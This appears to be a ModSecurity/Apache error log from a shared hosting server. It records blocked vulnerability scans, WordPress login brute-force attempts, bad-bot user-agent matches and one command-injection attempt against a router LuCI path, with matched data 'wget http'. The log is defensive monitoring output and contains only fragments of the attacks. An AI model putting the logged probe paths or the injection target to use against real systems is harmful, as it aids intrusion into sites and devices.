[Tue May 26 12:59:46.548796 2026] [security2:error] [pid 470766:tid 471018] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL6ujO_W1DqEcFHQ7fXgAAAHo"]
[Tue May 26 12:59:46.827554 2026] [security2:error] [pid 470766:tid 470986] [client 221.159.119.6:52321] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "wget http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "207.174.214.47"] [uri "/cgi-bin/luci/;stok=/locale"] [unique_id "ahVL6ujO_W1DqEcFHQ7fawAAAFo"]
[Tue May 26 12:59:46.827684 2026] [security2:error] [pid 470766:tid 470986] [client 221.159.119.6:52321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "207.174.214.47"] [uri "/cgi-bin/luci/;stok=/locale"] [unique_id "ahVL6ujO_W1DqEcFHQ7fawAAAFo"]
[Tue May 26 12:59:46.998918 2026] [security2:error] [pid 470766:tid 470963] [client 4.201.75.230:5639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/404.php"] [unique_id "ahVL6ujO_W1DqEcFHQ7fbAAAAEM"]
[Tue May 26 12:59:47.032087 2026] [security2:error] [pid 470766:tid 470947] [client 221.159.119.6:52382] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "wget http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "207.174.214.47"] [uri "/cgi-bin/luci/;stok=/locale"] [unique_id "ahVL6-jO_W1DqEcFHQ7fbgAAADM"]
[Tue May 26 12:59:47.032212 2026] [security2:error] [pid 470766:tid 470947] [client 221.159.119.6:52382] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "207.174.214.47"] [uri "/cgi-bin/luci/;stok=/locale"] [unique_id "ahVL6-jO_W1DqEcFHQ7fbgAAADM"]
[Tue May 26 12:59:47.421683 2026] [security2:error] [pid 470766:tid 470866] [remote 211.23.68.235:43559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVL6-jO_W1DqEcFHQ7fdwAAbWM"]
[Tue May 26 12:59:48.370026 2026] [security2:error] [pid 470766:tid 471004] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL6-jO_W1DqEcFHQ7fhAAAAGw"]
[Tue May 26 12:59:48.766600 2026] [security2:error] [pid 470766:tid 470996] [client 66.132.172.45:43784] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.marchedesedhiou.com.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVL7OjO_W1DqEcFHQ7fnAAAAGQ"]
[Tue May 26 12:59:50.099873 2026] [security2:error] [pid 470766:tid 470985] [client 4.201.75.230:5341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahVL7ujO_W1DqEcFHQ7f4QAAAFk"]
[Tue May 26 12:59:50.704593 2026] [security2:error] [pid 470766:tid 470923] [client 157.20.138.61:54853] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL7ujO_W1DqEcFHQ7f6AAAABs"]
[Tue May 26 12:59:50.704753 2026] [security2:error] [pid 470766:tid 470923] [client 157.20.138.61:54853] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL7ujO_W1DqEcFHQ7f6AAAABs"]
[Tue May 26 12:59:51.135983 2026] [security2:error] [pid 470766:tid 470899] [client 4.201.75.230:5326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-conf.php"] [unique_id "ahVL7-jO_W1DqEcFHQ7f9gAAAAM"]
[Tue May 26 12:59:51.573016 2026] [security2:error] [pid 470766:tid 471010] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL7-jO_W1DqEcFHQ7f8wAAAHI"]
[Tue May 26 12:59:53.568787 2026] [security2:error] [pid 470766:tid 470966] [client 4.201.75.230:5345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVL8ejO_W1DqEcFHQ7gJQAAAEY"]
[Tue May 26 12:59:53.960637 2026] [security2:error] [pid 470766:tid 470986] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL8ejO_W1DqEcFHQ7gMQAAAFo"]
[Tue May 26 12:59:54.918762 2026] [security2:error] [pid 470766:tid 470918] [client 4.201.75.230:5314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/abc.php"] [unique_id "ahVL8ujO_W1DqEcFHQ7gVwAAABY"]
[Tue May 26 12:59:56.171038 2026] [security2:error] [pid 470766:tid 470986] [client 45.148.10.204:33882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL8-jO_W1DqEcFHQ7gcQAAAFo"]
[Tue May 26 12:59:56.278430 2026] [security2:error] [pid 470766:tid 470897] [client 45.148.10.204:33896] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gdQAAAAE"]
[Tue May 26 12:59:56.351573 2026] [security2:error] [pid 470766:tid 471001] [client 45.148.10.204:33912] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gdgAAAGk"]
[Tue May 26 12:59:56.430740 2026] [security2:error] [pid 470766:tid 471022] [client 45.148.10.204:33922] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gfQAAAH4"]
[Tue May 26 12:59:56.460571 2026] [security2:error] [pid 470766:tid 470943] [client 45.148.10.204:33934] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gfgAAAC8"]
[Tue May 26 12:59:56.542344 2026] [security2:error] [pid 470766:tid 471023] [client 45.148.10.204:33932] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7ggwAAAH8"]
[Tue May 26 12:59:56.559483 2026] [security2:error] [pid 470766:tid 470959] [client 45.148.10.204:33946] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7ghQAAAD8"]
[Tue May 26 12:59:56.576891 2026] [security2:error] [pid 470766:tid 470956] [client 45.148.10.204:33926] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7ghAAAADw"]
[Tue May 26 12:59:56.662194 2026] [security2:error] [pid 470766:tid 471004] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gfAAAAGw"]
[Tue May 26 12:59:56.720374 2026] [security2:error] [pid 470766:tid 470948] [client 45.148.10.204:33954] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7giAAAADQ"]
[Tue May 26 12:59:56.721743 2026] [security2:error] [pid 470766:tid 470961] [client 45.148.10.204:33968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7giwAAAEE"]
[Tue May 26 12:59:56.779678 2026] [security2:error] [pid 470766:tid 470898] [client 119.93.249.179:59912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.249.93.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/xmlrpc.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gkAAAAAI"]
[Tue May 26 12:59:56.779861 2026] [security2:error] [pid 470766:tid 470898] [client 119.93.249.179:59912] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "jhonparra.com"] [uri "/xmlrpc.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7gkAAAAAI"]
[Tue May 26 12:59:56.902332 2026] [security2:error] [pid 470766:tid 470953] [client 45.148.10.204:33982] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7glAAAADk"]
[Tue May 26 12:59:57.078573 2026] [security2:error] [pid 470766:tid 471014] [client 45.148.10.204:33988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVL9OjO_W1DqEcFHQ7glwAAAHY"]
[Tue May 26 12:59:58.026565 2026] [security2:error] [pid 470766:tid 470910] [client 185.191.171.13:18996] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/rec/day/2026-05-05/"] [unique_id "ahVL9ujO_W1DqEcFHQ7gtAAAAA4"]
[Tue May 26 12:59:58.026711 2026] [security2:error] [pid 470766:tid 470910] [client 185.191.171.13:18996] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/rec/day/2026-05-05/"] [unique_id "ahVL9ujO_W1DqEcFHQ7gtAAAAA4"]
[Tue May 26 12:59:58.410744 2026] [security2:error] [pid 470766:tid 470933] [client 4.201.75.230:5366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/abcd.php"] [unique_id "ahVL9ujO_W1DqEcFHQ7gwAAAACU"]
[Tue May 26 12:59:58.773236 2026] [core:crit] [pid 470766:tid 470906] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:59:59.127701 2026] [security2:error] [pid 470766:tid 470973] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL9ujO_W1DqEcFHQ7gzgAAAE0"]
[Tue May 26 12:59:59.806256 2026] [security2:error] [pid 470766:tid 470903] [client 74.7.175.136:58136] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahVL9-jO_W1DqEcFHQ7g6AAAAAc"]
[Tue May 26 13:00:00.186524 2026] [security2:error] [pid 470766:tid 470981] [client 4.201.75.230:5681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/as.php"] [unique_id "ahVL-OjO_W1DqEcFHQ7g7wAAAFU"]
[Tue May 26 13:00:01.147995 2026] [security2:error] [pid 470766:tid 471004] [client 157.20.138.61:55216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL-ejO_W1DqEcFHQ7hCAAAAGw"]
[Tue May 26 13:00:01.148161 2026] [security2:error] [pid 470766:tid 471004] [client 157.20.138.61:55216] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL-ejO_W1DqEcFHQ7hCAAAAGw"]
[Tue May 26 13:00:01.331721 2026] [security2:error] [pid 470766:tid 470996] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL-OjO_W1DqEcFHQ7hAQAAAGQ"]
[Tue May 26 13:00:02.120381 2026] [security2:error] [pid 470766:tid 470993] [client 216.234.215.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL-ejO_W1DqEcFHQ7hFwAAAGE"]
[Tue May 26 13:00:02.352424 2026] [security2:error] [pid 470766:tid 470906] [client 4.201.75.230:5372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-trackback.php"] [unique_id "ahVL-ujO_W1DqEcFHQ7hKgAAAAo"]
[Tue May 26 13:00:04.577597 2026] [security2:error] [pid 470766:tid 471000] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL_OjO_W1DqEcFHQ7hVwAAAGg"]
[Tue May 26 13:00:06.485554 2026] [security2:error] [pid 470766:tid 470955] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL_ujO_W1DqEcFHQ7hgAAAADs"]
[Tue May 26 13:00:06.527758 2026] [security2:error] [pid 470766:tid 470824] [remote 74.7.241.58:34264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVL_ujO_W1DqEcFHQ7hjgAAZDk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields
[Tue May 26 13:00:08.911540 2026] [security2:error] [pid 470766:tid 470899] [client 4.201.75.230:5317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/about.php"] [unique_id "ahVMAOjO_W1DqEcFHQ7hwAAAAAM"]
[Tue May 26 13:00:09.542734 2026] [security2:error] [pid 470766:tid 471018] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMAejO_W1DqEcFHQ7hxwAAAHo"]
[Tue May 26 13:00:11.818037 2026] [security2:error] [pid 470766:tid 470929] [client 157.20.138.61:55574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMA-jO_W1DqEcFHQ7h-wAAACE"]
[Tue May 26 13:00:11.818215 2026] [security2:error] [pid 470766:tid 470929] [client 157.20.138.61:55574] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMA-jO_W1DqEcFHQ7h-wAAACE"]
[Tue May 26 13:00:11.972166 2026] [security2:error] [pid 470766:tid 470933] [client 4.201.75.230:5632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/file.php"] [unique_id "ahVMA-jO_W1DqEcFHQ7iAwAAACU"]
[Tue May 26 13:00:12.310454 2026] [security2:error] [pid 470766:tid 471023] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMA-jO_W1DqEcFHQ7h_gAAAH8"]
[Tue May 26 13:00:14.264213 2026] [security2:error] [pid 470766:tid 471004] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMBejO_W1DqEcFHQ7iNwAAAGw"]
[Tue May 26 13:00:14.540845 2026] [security2:error] [pid 470766:tid 470974] [client 4.201.75.230:5346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/adminfuns.php"] [unique_id "ahVMBujO_W1DqEcFHQ7iSAAAAE4"]
[Tue May 26 13:00:17.372809 2026] [security2:error] [pid 470766:tid 470952] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMCOjO_W1DqEcFHQ7ijQAAADg"]
[Tue May 26 13:00:19.354283 2026] [security2:error] [pid 470766:tid 470961] [client 4.201.75.230:5356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-good.php"] [unique_id "ahVMC-jO_W1DqEcFHQ7i1AAAAEE"]
[Tue May 26 13:00:19.496349 2026] [security2:error] [pid 470766:tid 470852] [remote 45.32.67.165:60758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVMC-jO_W1DqEcFHQ7i0AAAD1U"]
[Tue May 26 13:00:19.670587 2026] [security2:error] [pid 470766:tid 471000] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMC-jO_W1DqEcFHQ7izgAAAGg"]
[Tue May 26 13:00:21.802352 2026] [security2:error] [pid 470766:tid 471019] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMDejO_W1DqEcFHQ7i_QAAAHs"]
[Tue May 26 13:00:22.219353 2026] [security2:error] [pid 470766:tid 471012] [client 157.20.138.61:55933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMDujO_W1DqEcFHQ7jDAAAAHQ"]
[Tue May 26 13:00:22.219470 2026] [security2:error] [pid 470766:tid 471012] [client 157.20.138.61:55933] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMDujO_W1DqEcFHQ7jDAAAAHQ"]
[Tue May 26 13:00:22.243148 2026] [security2:error] [pid 470766:tid 470897] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVMDujO_W1DqEcFHQ7jCwAAAAE"]
[Tue May 26 13:00:22.518030 2026] [security2:error] [pid 470766:tid 470936] [client 4.201.75.230:5365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/xmlrpc.php"] [unique_id "ahVMDujO_W1DqEcFHQ7jDQAAACg"]
